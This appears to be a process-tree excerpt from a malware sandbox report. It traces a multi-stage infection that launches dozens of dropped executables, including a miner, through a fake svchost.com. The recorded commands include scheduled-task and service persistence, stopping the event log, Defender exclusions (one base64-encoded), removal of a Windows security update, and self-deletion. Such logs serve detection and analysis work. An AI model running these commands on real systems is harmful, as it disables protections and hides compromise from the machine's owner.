- - C:\Users\Admin\AppData\Local\Temp\Files\amert.exe
    C:\Users\Admin\AppData\Local\Temp\Files\amert.exe
    3⤵
    PID:748
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"
  2⤵
  PID:320
- - C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
    C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
    3⤵
    PID:1856
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      4⤵
      PID:2348
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\plaza.exe"
  2⤵
  PID:2348
- - C:\Users\Admin\AppData\Local\Temp\Files\plaza.exe
    C:\Users\Admin\AppData\Local\Temp\Files\plaza.exe
    3⤵
    PID:2424
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:2576
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:2768
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_e0ad8e931a5f82aae3542308d2dd0891\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_e0ad8e931a5f82aae3542308d2dd0891 HR" /sc HOURLY /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:3372
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_e0ad8e931a5f82aae3542308d2dd0891\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_e0ad8e931a5f82aae3542308d2dd0891 LG" /sc ONLOGON /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:1112
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\HEIDIJ~1\R5FHRH~1.EXE"
      4⤵
      PID:3244
    - - C:\Users\Admin\AppData\Local\Temp\HEIDIJ~1\R5FHRH~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\HEIDIJ~1\R5FHRH~1.EXE
        5⤵
        
        PID:4012
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\HEIDIJ~1\G5_AZF~1.EXE"
      4⤵
      PID:2412
    - - C:\Users\Admin\AppData\Local\Temp\HEIDIJ~1\G5_AZF~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\HEIDIJ~1\G5_AZF~1.EXE
        5⤵
        
        PID:3808
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_6c1db83c42dae4a2f4b617a6c016c6f6\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_6c1db83c42dae4a2f4b617a6c016c6f6 HR" /sc HOURLY /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:4040
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_6c1db83c42dae4a2f4b617a6c016c6f6\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_6c1db83c42dae4a2f4b617a6c016c6f6 LG" /sc ONLOGON /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:4296
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\HEIDIJ~1\1XVVEK~1.EXE"
      4⤵
      PID:3768
    - - C:\Users\Admin\AppData\Local\Temp\HEIDIJ~1\1XVVEK~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\HEIDIJ~1\1XVVEK~1.EXE
        5⤵
        
        PID:1096
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\09FD85~1\explorha.exe"
        6⤵
        
        PID:4608
        
        C:\Users\Admin\AppData\Local\Temp\09FD85~1\explorha.exe
        
        C:\Users\Admin\AppData\Local\Temp\09FD85~1\explorha.exe
        7⤵
        
        PID:4748
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\09FD85~1\explorha.exe"
        8⤵
        
        PID:3444
        
        C:\Users\Admin\AppData\Local\Temp\09FD85~1\explorha.exe
        
        C:\Users\Admin\AppData\Local\Temp\09FD85~1\explorha.exe
        9⤵
        
        PID:4940
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\09FD85~1\explorha.exe"
        10⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\09FD85~1\explorha.exe
        
        C:\Users\Admin\AppData\Local\Temp\09FD85~1\explorha.exe
        11⤵
        
        PID:2252
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\09FD85~1\explorha.exe"
        12⤵
        
        PID:3168
        
        C:\Users\Admin\AppData\Local\Temp\09FD85~1\explorha.exe
        
        C:\Users\Admin\AppData\Local\Temp\09FD85~1\explorha.exe
        13⤵
        
        PID:3092
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
  2⤵
  PID:3012
- - C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
    C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
    3⤵
    PID:1400
  - - C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
      C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
      4⤵
      PID:3088
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\virus.exe"
  2⤵
  PID:2552
- - C:\Users\Admin\AppData\Local\Temp\Files\virus.exe
    C:\Users\Admin\AppData\Local\Temp\Files\virus.exe
    3⤵
    PID:1292
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\TEST_2~1.EXE"
  2⤵
  PID:1876
- - C:\Users\Admin\AppData\Local\Temp\Files\TEST_2~1.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\TEST_2~1.EXE
    3⤵
    PID:2772
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\msmng2.exe"
  2⤵
  PID:188
- - C:\Users\Admin\AppData\Local\Temp\Files\msmng2.exe
    C:\Users\Admin\AppData\Local\Temp\Files\msmng2.exe
    3⤵
    PID:1564
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      sad
      4⤵
      PID:1228
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      sad
      4⤵
      PID:1452
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      sad
      4⤵
      PID:4172
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      sad
      4⤵
      PID:4764
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      sad
      4⤵
      PID:3300
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\VLTKNH~1.EXE"
  2⤵
  PID:1908
- - C:\Users\Admin\AppData\Local\Temp\Files\VLTKNH~1.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\VLTKNH~1.EXE
    3⤵
    PID:2944
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\288C47~1.EXE"
  2⤵
  PID:2808
- - C:\Users\Admin\AppData\Local\Temp\Files\288C47~1.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\288C47~1.EXE
    3⤵
    PID:1456
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\INSTAL~1.EXE"
      4⤵
      PID:1488
    - - C:\Users\Admin\AppData\Local\Temp\INSTAL~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\INSTAL~1.EXE
        5⤵
        
        PID:772
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\ULG0~1.EXE"
        6⤵
        
        PID:588
        
        C:\Users\Admin\AppData\Local\Temp\ULG0~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\ULG0~1.EXE
        7⤵
        
        PID:1596
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\ULG1~1.EXE"
        6⤵
        
        PID:828
        
        C:\Users\Admin\AppData\Local\Temp\ULG1~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\ULG1~1.EXE
        7⤵
        
        PID:2584
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
        8⤵
        
        PID:4804
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        9⤵
        
        PID:4552
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        9⤵
        Creates scheduled task(s)
        
        PID:2184
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE"
      4⤵
      PID:1900
    - - C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE
        5⤵
        
        PID:380
      - C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE
        6⤵
        
        PID:2020
        
        C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE"
        7⤵
        
        PID:2572
        
        C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\288C47~1.EXE"
        8⤵
        
        PID:4480
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\FourthX.exe"
      4⤵
      PID:1492
    - - C:\Users\Admin\AppData\Local\Temp\FourthX.exe
        
        C:\Users\Admin\AppData\Local\Temp\FourthX.exe
        5⤵
        
        PID:2732
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        
        PID:1616
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:2304
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:3720
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "UTIXDCVF"
        6⤵
        Launches sc.exe
        
        PID:2000
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:3792
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:3616
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "UTIXDCVF"
        6⤵
        Launches sc.exe
        
        PID:3108
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\SIGNED~1.EXE"
  2⤵
  PID:2100
- - C:\Users\Admin\AppData\Local\Temp\Files\SIGNED~1.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\SIGNED~1.EXE
    3⤵
    PID:2276
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\swizzyy.exe"
  2⤵
  PID:2052
- - C:\Users\Admin\AppData\Local\Temp\Files\swizzyy.exe
    C:\Users\Admin\AppData\Local\Temp\Files\swizzyy.exe
    3⤵
    PID:2172
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:1228
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\SETUP2~1.EXE"
  2⤵
  PID:2324
- - C:\Users\Admin\AppData\Local\Temp\Files\SETUP2~1.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\SETUP2~1.EXE
    3⤵
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\AITMP0\CleanUp Icons FOP.exe
      "C:\Users\Admin\AppData\Local\Temp\AITMP0\CleanUp Icons FOP.exe" /s %3
      4⤵
      PID:3916
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mode con:cols=0080 lines=0025
        5⤵
        
        PID:3356
      - C:\Windows\SysWOW64\mode.com
        
        mode con:cols=0080 lines=0025
        6⤵
        
        PID:908
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c title Window Title
        5⤵
        
        PID:2612
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\afolder" mkdir "C:\Users\Admin\AppData\Local\Temp\afolder"
        5⤵
        
        PID:1960
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\xtmp" mkdir "C:\Users\Admin\AppData\Local\Temp\xtmp"
        5⤵
        
        PID:2768
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c attrib +h C:\Users\Admin\AppData\Local\Temp\xtmp
        5⤵
        
        PID:3528
      - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h C:\Users\Admin\AppData\Local\Temp\xtmp
        6⤵
        Views/modifies file attributes
        
        PID:3600
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c echo:0>C:\Users\Admin\AppData\Local\Temp\is64.txt
        5⤵
        
        PID:3500
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\is64.bat
        5⤵
        
        PID:3188
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp66747.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp66747.bat"
        5⤵
        
        PID:4028
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp67237.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp67237.exe"
        5⤵
        
        PID:3636
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp66747.bat "C:\Users\Admin\AppData\Local\Temp\AITMP0\CleanUp Icons FOP.exe" /s %3
        5⤵
        
        PID:3796
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp66747.bat "C:\Users\Admin\AppData\Local\Temp\AITMP0\CleanUp Icons FOP.exe" /s %3
        6⤵
        
        PID:3292
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp66747.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp66747.bat"
        5⤵
        
        PID:2156
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp67237.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp67237.exe"
        5⤵
        
        PID:2064
  - - C:\Users\Admin\AppData\Local\Temp\AITMP0\IconRemoval.exe
      "C:\Users\Admin\AppData\Local\Temp\AITMP0\IconRemoval.exe" /s %2
      4⤵
      PID:952
  - - C:\Users\Admin\AppData\Local\Temp\AITMP0\7zipFOPBACKEND.exe
      "C:\Users\Admin\AppData\Local\Temp\AITMP0\7zipFOPBACKEND.exe" /s %1
      4⤵
      PID:2768
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"
  2⤵
  PID:1488
- - C:\Users\Admin\AppData\Local\Temp\Files\npp.exe
    C:\Users\Admin\AppData\Local\Temp\Files\npp.exe
    3⤵
    PID:1452
  - - C:\Users\Admin\AppData\Local\Temp\260421327.exe
      C:\Users\Admin\AppData\Local\Temp\260421327.exe
      4⤵
      PID:4064
    - - C:\Users\Admin\AppData\Local\Temp\1714328422.exe
        
        C:\Users\Admin\AppData\Local\Temp\1714328422.exe
        5⤵
        
        PID:1028
    - - C:\Users\Admin\AppData\Local\Temp\1090629303.exe
        
        C:\Users\Admin\AppData\Local\Temp\1090629303.exe
        5⤵
        
        PID:4892
    - - C:\Users\Admin\AppData\Local\Temp\1749824044.exe
        
        C:\Users\Admin\AppData\Local\Temp\1749824044.exe
        5⤵
        
        PID:4252
    - - C:\Users\Admin\AppData\Local\Temp\2986120520.exe
        
        C:\Users\Admin\AppData\Local\Temp\2986120520.exe
        5⤵
        
        PID:3492
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\3.exe"
  2⤵
  PID:1636
- - C:\Users\Admin\AppData\Local\Temp\Files\3.exe
    C:\Users\Admin\AppData\Local\Temp\Files\3.exe
    3⤵
    PID:2104
  - - C:\Users\Admin\AppData\Local\Temp\Files\3.exe
      C:\Users\Admin\AppData\Local\Temp\Files\3.exe
      4⤵
      PID:2840
    - - C:\Windows\SysWOW64\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        5⤵
        
        PID:2560
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~2.EXE"
  2⤵
  PID:572
- - C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~2.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~2.EXE
    3⤵
    PID:2872
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U27S0~1.EXE"
      4⤵
      PID:2280
    - - C:\Users\Admin\AppData\Local\Temp\U27S0~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U27S0~1.EXE
        5⤵
        
        PID:2640
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U27S1~1.EXE"
      4⤵
      PID:4532
    - - C:\Users\Admin\AppData\Local\Temp\U27S1~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U27S1~1.EXE
        5⤵
        
        PID:4148
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\windows.exe"
  2⤵
  PID:3704
- - C:\Users\Admin\AppData\Local\Temp\Files\windows.exe
    C:\Users\Admin\AppData\Local\Temp\Files\windows.exe
    3⤵
    PID:5092
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\fu.exe"
  2⤵
  PID:4200
- - C:\Users\Admin\AppData\Local\Temp\Files\fu.exe
    C:\Users\Admin\AppData\Local\Temp\Files\fu.exe
    3⤵
    PID:4800
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/
      4⤵
      PID:3656
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3656 CREDAT:275457 /prefetch:2
        5⤵
        
        PID:3576
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.linkedin.com/login
      4⤵
      PID:4924
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4924 CREDAT:275457 /prefetch:2
        5⤵
        
        PID:3696
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/video
      4⤵
      PID:2540
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2540 CREDAT:275457 /prefetch:2
        5⤵
        
        PID:2464
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/
      4⤵
      PID:2332
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2332 CREDAT:275457 /prefetch:2
        5⤵
        
        PID:2948
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\MINER-~1.EXE"
  2⤵
  PID:3636
- - C:\Users\Admin\AppData\Local\Temp\Files\MINER-~1.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\MINER-~1.EXE
    3⤵
    PID:1400
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "FLWCUERA"
      4⤵
      Launches sc.exe
      PID:4780
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "FLWCUERA" binpath= "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:3684
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:4944
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "FLWCUERA"
      4⤵
      Launches sc.exe
      PID:4528
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Files\MINER-~1.EXE"
      4⤵
      PID:4740
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:2236
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\SYNERG~1.EXE"
  2⤵
  PID:3136
- - C:\Users\Admin\AppData\Local\Temp\Files\SYNERG~1.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\SYNERG~1.EXE
    3⤵
    PID:1744
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\native.exe"
  2⤵
  PID:3664
- - C:\Users\Admin\AppData\Local\Temp\Files\native.exe
    C:\Users\Admin\AppData\Local\Temp\Files\native.exe
    3⤵
    PID:4664
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\msfiler.exe"
  2⤵
  PID:4212
- - C:\Users\Admin\AppData\Local\Temp\Files\msfiler.exe
    C:\Users\Admin\AppData\Local\Temp\Files\msfiler.exe
    3⤵
    PID:4588
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwAbQBzAGYAaQBsAGUAcgAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAbQBzAGYAaQBsAGUAcgAuAGUAeABlADsA
      4⤵
      PID:3188
    - - C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwAbQBzAGYAaQBsAGUAcgAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAbQBzAGYAaQBsAGUAcgAuAGUAeABlADsA
        5⤵
        
        PID:4312
  - - C:\Users\Admin\AppData\Local\Temp\Files\msfiler.exe
      C:\Users\Admin\AppData\Local\Temp\Files\msfiler.exe
      4⤵
      PID:4700
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\msfiler.exe'
        5⤵
        
        PID:2924
      - C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\msfiler.exe'
        6⤵
        
        PID:2732
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msfiler.exe'
        5⤵
        
        PID:3428
      - C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msfiler.exe'
        6⤵
        
        PID:4344
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\mdnsresp.exe'
        5⤵
        
        PID:4768
      - C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\mdnsresp.exe'
        6⤵
        
        PID:4420
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mdnsresp.exe'
        5⤵
        
        PID:4628
      - C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mdnsresp.exe'
        6⤵
        
        PID:2008
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\DELTA_~1.EXE"
  2⤵
  PID:2008
- - C:\Users\Admin\AppData\Local\Temp\Files\DELTA_~1.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\DELTA_~1.EXE
    3⤵
    PID:3580
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\asas.exe"
  2⤵
  PID:4552
- - C:\Users\Admin\AppData\Local\Temp\Files\asas.exe
    C:\Users\Admin\AppData\Local\Temp\Files\asas.exe
    3⤵
    PID:4400
  - - C:\Windows\System32\werfault.exe
      \??\C:\Windows\System32\werfault.exe
      4⤵
      PID:2400
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\GAMMA_~1.EXE"
  2⤵
  PID:4476
- - C:\Users\Admin\AppData\Local\Temp\Files\GAMMA_~1.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\GAMMA_~1.EXE
    3⤵
    PID:1660
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
  2⤵
  PID:3956
- - C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
    C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
    3⤵
    PID:4016
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\funta.exe"
  2⤵
  PID:3840
- - C:\Users\Admin\AppData\Local\Temp\Files\funta.exe
    C:\Users\Admin\AppData\Local\Temp\Files\funta.exe
    3⤵
    PID:1188
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\MAINSI~1.EXE"
  2⤵
  PID:1604
